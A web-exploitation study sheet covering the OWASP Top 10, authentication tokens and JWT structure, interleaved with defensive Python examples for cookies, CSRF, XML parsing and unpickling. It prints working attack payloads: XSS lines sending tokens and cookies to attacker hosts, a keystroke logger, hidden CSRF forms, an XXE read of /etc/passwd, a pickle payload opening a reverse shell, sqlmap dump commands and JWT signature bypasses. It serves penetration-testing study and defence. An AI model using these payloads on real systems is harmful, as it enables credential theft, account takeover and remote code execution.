Web exploitation cannot happen without proxying and advanced tools such as:
- Burp Suite
  - Not open-source, but it offers a free community edition [Link].
- OpenVAS
  - Free and open-source [Link].
It is fundamental to master all OWASP Top 10 vulnerabilities.
- A01:2021 – Broken Access Control
  - Incorrectly implemented authentication and session management calls.
- A02:2021 – Cryptographic Failures
  - Failure to protect data in transit and at rest. Example: plain-text passwords, not using SSL…
- A03:2021 – Injection
  - Untrusted input that is inserted (or injected) so that it is executed as if it were part of the program's code.
- A04:2021 – Insecure Design
  - Missing or ineffective controls in the design of the application.
- A05:2021 – Security Misconfiguration
  - Misconfigured access controls, such as default credentials or empty passwords.
- A06:2021 – Vulnerable and Outdated Components
  - Software that is vulnerable, unsupported, or out of date, including the OS, dependencies…
- A07:2021 – Identification and Authentication Failures
  - Failure to confirm the user's identity; flawed authentication and session management.
- A08:2021 – Software and Data Integrity Failures
  - Data integrity issues related to code or infrastructure, e.g. violations caused by libraries from untrusted sources, CDNs…
- A09:2021 – Security Logging and Monitoring Failures
  - Failure to detect, escalate, and respond to active breaches.
- A10:2021 – Server-Side Request Forgery (SSRF)
  - Flaws that occur whenever a web application fetches a remote resource without validating the user-supplied URL.
AUTHENTICATION
- Basic Auth
  - Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
  - Where dXNlcm5hbWU6cGFzc3dvcmQ= is username:password encoded in Base64.
- Session Token
  - Authorization: Bearer 68e8c01795215bc01492faf3403a400c
  - Where 68e8c01795215bc01492faf3403a400c is just an opaque, randomly generated hash stored server-side.
  - It requires a server-side look-up for each request (local storage or database), where it can be revoked if compromised.
- JWT
  - Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30
  - The token can be divided into three parts: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 is the header, eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0 is the payload, and KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30 is the signature.
  - The signature makes it self-contained, meaning the server can verify it autonomously and accept it within the expiration period (not revocable).
  - The header defines how the header+payload are signed. Typically, HS256 (symmetric) or RS256 (asymmetric).
  - Common mistakes are not checking the signature (set "alg": "none" and, optionally, remove the signature entirely).
  - If the server-side key is exposed, try to force HS256 and sign the token with the symmetric key.
On the client side, the authentication token is typically stored using one of the following methods.
- Local Storage
  - It can be read by any script running on the page.
  - Susceptible to XSS attacks:
    fetch(`https://attacker.com/steal?data=${localStorage.getItem('token')}`);
    new Image().src = `https://attacker.com/log?token=${localStorage.getItem('auth_token')}`;
    location.replace(`https://attacker.com/collect?token=${localStorage.getItem('session')}`);
- Cookie
  - HTTP-Only: the token is stored at the browser level, and JavaScript cannot see it.
  - When samesite=none, the browser will send the cookie on any request the page makes, including to other origins.
  - Susceptible to CSRF attacks:
    - Reflected
      - It is delivered to the victim through an external link, a spoofed website, or a malicious email.
      - The malicious website contains hidden code that makes a call to the vulnerable website on behalf of the user.
      - If the user is already authenticated on the vulnerable site, the browser will send a valid session token.
        <img src="https://bank.com/transfer?amount=10000&to=AttackerID" width="0" height="0" />
        <form id="steal" action="https://bank.com/transfer" method="POST">
          <input type="hidden" name="amount" value="10000" />
          <input type="hidden" name="to" value="AttackerID" />
        </form>
        <script>document.getElementById('steal').submit();</script>
    - Stored / DOM-Based
      - The malicious code, typically JavaScript or HTML, is stored (persistently) in the vulnerable website, which does not properly sanitize/validate users' inputs (e.g. posts, messages).
      - Any user who views the infected page (like a forum thread, a profile, or a support ticket) will unknowingly execute the attack.
      - Because the request originates from the same domain as the vulnerable site, it is highly effective at bypassing browser security settings and is often harder for users to detect.
      - The difference between DOM-based and stored is that the DOM-based variant happens in the live rendering of the site, but it has the same impact and capability.
        <img src="https://vulnerable-site.com/api/delete-account" width="0" height="0" />
        <script>
          fetch('https://vulnerable-site.com/api/update-role', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: 'user_id=attacker_id&role=admin',
            credentials: 'include'
          });
        </script>
  - Some attacks can be prevented with samesite=strict, but not all.
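The server-side counterpart to the storage notes above, as an added example in Python (not code from the original page): a Set-Cookie value carrying HttpOnly, Secure and SameSite=Strict, plus a CSRF check for state-changing requests that combines a per-session synchronizer token with an Origin/Referer comparison. The request dictionaries, the bank.com and attacker.com origins and the csrf_token field name are constructed for the demo.

```python
import hmac
import secrets
from http.cookies import SimpleCookie
from typing import Mapping, Optional
from urllib.parse import urlsplit


def session_cookie_header(name: str, value: str, max_age: int = 3600) -> str:
    """Build the Set-Cookie value for a session token.

    HttpOnly keeps it out of reach of page scripts (the localStorage
    problem), Secure restricts it to HTTPS, and SameSite=Strict stops the
    browser from attaching it to cross-site requests such as the bank.com
    transfer examples.
    """
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Strict"
    morsel["path"] = "/"
    morsel["max-age"] = max_age
    return morsel.OutputString()


def new_csrf_token() -> str:
    """Synchronizer token: generated server-side, stored with the session,
    and echoed back in every state-changing form."""
    return secrets.token_urlsafe(32)


def _same_origin(url: str, allowed: str) -> bool:
    # Compare scheme and host exactly; a prefix check would accept
    # "https://bank.com.example" for "https://bank.com".
    got, want = urlsplit(url), urlsplit(allowed)
    return bool(got.scheme) and (got.scheme, got.netloc) == (want.scheme, want.netloc)


def is_csrf_safe(method: str, headers: Mapping[str, str], form: Mapping[str, str],
                 session_csrf_token: Optional[str], allowed_origin: str) -> bool:
    """Decide whether a state-changing request may proceed.

    Two independent checks, because SameSite alone does not cover every
    case: the Origin (or Referer) must belong to the site, and the form
    must carry the token that was issued to this session.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True  # safe methods must not change state, so nothing to protect
    origin = headers.get("Origin") or headers.get("Referer", "")
    if not _same_origin(origin, allowed_origin):
        return False
    submitted = form.get("csrf_token")
    if not session_csrf_token or not submitted:
        return False
    # Constant-time comparison so the check does not leak the token.
    return hmac.compare_digest(submitted.encode(), session_csrf_token.encode())


if __name__ == "__main__":
    token = new_csrf_token()
    print(session_cookie_header("session", "68e8c01795215bc01492faf3403a400c"))
    # Constructed cross-site POST, like the hidden form on the attacker page.
    print(is_csrf_safe("POST", {"Origin": "https://attacker.com"},
                       {"amount": "10000", "to": "AttackerID"}, token, "https://bank.com"))
```

The cookie attributes protect the token itself; the token-plus-origin check protects the endpoints, which is what still matters for the cases SameSite does not cover.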
MORE PAYLOADS
- XXE (XML eXternal Entity attack)
    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
    <root>&read;</root>
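An added example, not from the original page: a Python parser for untrusted XML that refuses any DOCTYPE, so an entity like the one above can never be declared, let alone expanded. It uses only the standard-library expat bindings; the two sample documents are constructed.

```python
import xml.parsers.expat as expat
from typing import Dict, List


class DtdForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (and so possibly entities)."""


def parse_untrusted_xml(data: str) -> Dict[str, str]:
    """Parse XML into {element name: text} while refusing any DTD.

    Without a DOCTYPE no entity can be declared, so an external entity
    pointing at file:///etc/passwd never gets a chance to be expanded.
    The flat mapping is enough for the demo; a real service would build
    a tree or bind to a schema.
    """
    parser = expat.ParserCreate()
    texts: Dict[str, str] = {}
    open_elements: List[str] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def on_entity(*args):
        # Belt and braces: entity declarations only occur inside a DTD.
        raise DtdForbidden("entity declarations are not allowed")

    def on_start(name, attrs):
        open_elements.append(name)
        texts.setdefault(name, "")

    def on_end(name):
        open_elements.pop()

    def on_text(text):
        if open_elements:
            texts[open_elements[-1]] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    # No ExternalEntityRefHandler is installed, so expat would not fetch
    # external resources on its own even if a DTD slipped through.
    parser.Parse(data, True)
    return texts


def is_rejected(data: str) -> bool:
    """True when the document is refused because of a DTD."""
    try:
        parse_untrusted_xml(data)
    except DtdForbidden:
        return True
    return False


# Constructed samples: the first has the XXE payload shape from the notes,
# the second is a harmless document of the same structure.
XXE_SAMPLE = ("<?xml version=\"1.0\"?>"
              "<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>"
              "<root>&read;</root>")
BENIGN_SAMPLE = "<?xml version=\"1.0\"?><root><name>alice</name></root>"

if __name__ == "__main__":
    print("XXE sample rejected:", is_rejected(XXE_SAMPLE))
    print("benign sample:", parse_untrusted_xml(BENIGN_SAMPLE))
```

Rejecting the DTD outright is the same strategy the defusedxml package uses with forbid_dtd; it is simpler to reason about than trying to allow "safe" entities.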
- XSS (possible in JavaScript, VBScript, Flash, and CSS)
It is worth mentioning the popular sources of payloads: PayLoadBox [Link], XSS-Payloads [Link].
Quick tests for low-hanging fruit:
<script>alert(1)</script>
<image src="javascript:alert(1)">
<body oninput=javascript:alert(1)><input autofocus>
<img \x00src=x onerror="alert(1)">
A payload for stealing Cookies:
<script>document.location='http://ip:port/?='+document.cookie;</script>
A very simple key logger:
    <script>
    var keys = '';
    document.onkeypress = function(e) {
      get = window.event ? event : e;
      key = get.keyCode ? get.keyCode : get.charCode;
      key = String.fromCharCode(key);
      keys += key;
    }
    window.setInterval(function() {
      new Image().src = 'https://attackerAddress/kl.php?c=' + keys;
      keys = '';
    }, 1000);
    </script>
- Insecure Deserialization (the output of the following script is the payload)
    import base64
    import pickle

    # Reverse-shell one-liner that os.system runs when the pickle is loaded.
    command = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
               '/bin/sh -i 2>&1 | netcat 10.10.10.10 4444 > /tmp/f')

    class rce(object):
        # pickle calls the returned callable with the given arguments on load.
        def __reduce__(self):
            import os
            return (os.system, (command,))

    # Base64 so the bytes survive as a request parameter.
    print(base64.b64encode(pickle.dumps(rce())).decode())
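The defensive side of the script above, as an added example (not part of the original notes) in Python. A constructed class stands in for rce, with a harmless callable in __reduce__, to show that pickle.loads runs whatever the payload names; a RestrictedUnpickler then refuses every global that is not on an allow-list, so os.system is never even resolved. The Demo class, the allow-list and the helper names are assumptions for the demo.

```python
import base64
import io
import os
import pickle


class Demo:
    """Constructed stand-in for the rce class in the notes. Instead of a
    shell command, __reduce__ asks the unpickler to call os.path.join:
    harmless, but the mechanism is identical and the sender chooses the
    callable."""

    def __reduce__(self):
        return (os.path.join, ("constructed", "marker"))


DEMO_PAYLOAD = base64.b64encode(pickle.dumps(Demo()))
EXPECTED_CALL_RESULT = os.path.join("constructed", "marker")


def unsafe_loads(payload_b64: bytes):
    """What the vulnerable server does: pickle.loads executes the callable."""
    return pickle.loads(base64.b64decode(payload_b64))


class RestrictedUnpickler(pickle.Unpickler):
    """Only globals on the allow-list may be resolved; everything else,
    os.system included, is refused before it is ever looked up."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(payload_b64: bytes):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(payload_b64))).load()


def is_rejected(payload_b64: bytes) -> bool:
    """True when the restricted unpickler refuses the payload."""
    try:
        safe_loads(payload_b64)
    except pickle.UnpicklingError:
        return True
    return False


def roundtrip_plain(obj):
    """Plain containers carry no globals, so they pass the restricted loader."""
    return safe_loads(base64.b64encode(pickle.dumps(obj)))


if __name__ == "__main__":
    print(DEMO_PAYLOAD.decode())
    print("pickle.loads ->", unsafe_loads(DEMO_PAYLOAD))
    print("restricted   ->", "rejected" if is_rejected(DEMO_PAYLOAD) else "accepted")
```

The allow-list is the whole defence: if an application needs to unpickle its own classes it must add them explicitly, and if it takes data from clients at all, a format without code execution (JSON) is the better choice.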
INJECTION
- SQLmap – SQL injection and database takeover [Link]:
    sqlmap -r requestFile
    sqlmap -r requestFile --dump
  Note: requestFile contains the HTTP request that SQLmap uses as the base for its injection attempts.
  See more usage and examples of SQLmap in the other post [Link].
MORE ON JWT
<HEADER>.<BODY>.<SIGNATURE>
Online handy tools [Link] and [Link].
- Header
  - alg (Algorithm)
    - ES256: Elliptic Curve (asymmetric).
    - RS256: RSA with SHA-256 (asymmetric).
    - HS256: HMAC with SHA-256 (symmetric).
    - more
  - typ (Type)
    - JWT: JSON Web Token. Default value.
    - JWS: JSON Web Signature, which is a signed JSON.
    - JWE: JSON Web Encryption, which is an encrypted JSON.
  - kid (Key ID)
    - It identifies the key used to sign the JWT.
  - jku (JWK Set URL)
    - Contains the URL to the public key in JWK Set JSON format, as an array of keys.
    - Most popular: RSA
      - use (intended use) = sig
      - n (Modulus) = Eq4...x3JjcHw
      - e (Exponent) = AQAB
      - alg (Algorithm) = RS256
    - Most secure: EC
      - crv (Curve) = P-256
      - x (Coordinate in Base64) = Usdf...Tou87Fs
      - y (Coordinate in Base64) = x9KJjo...MJ89x
      - alg (Algorithm) = ES256
- Payload
  - Anything in a JSON format.
- Signature
  - It is a hash look-alike generated by applying a cryptographic function (an HMAC or a digital signature) to a combination of the header and the payload.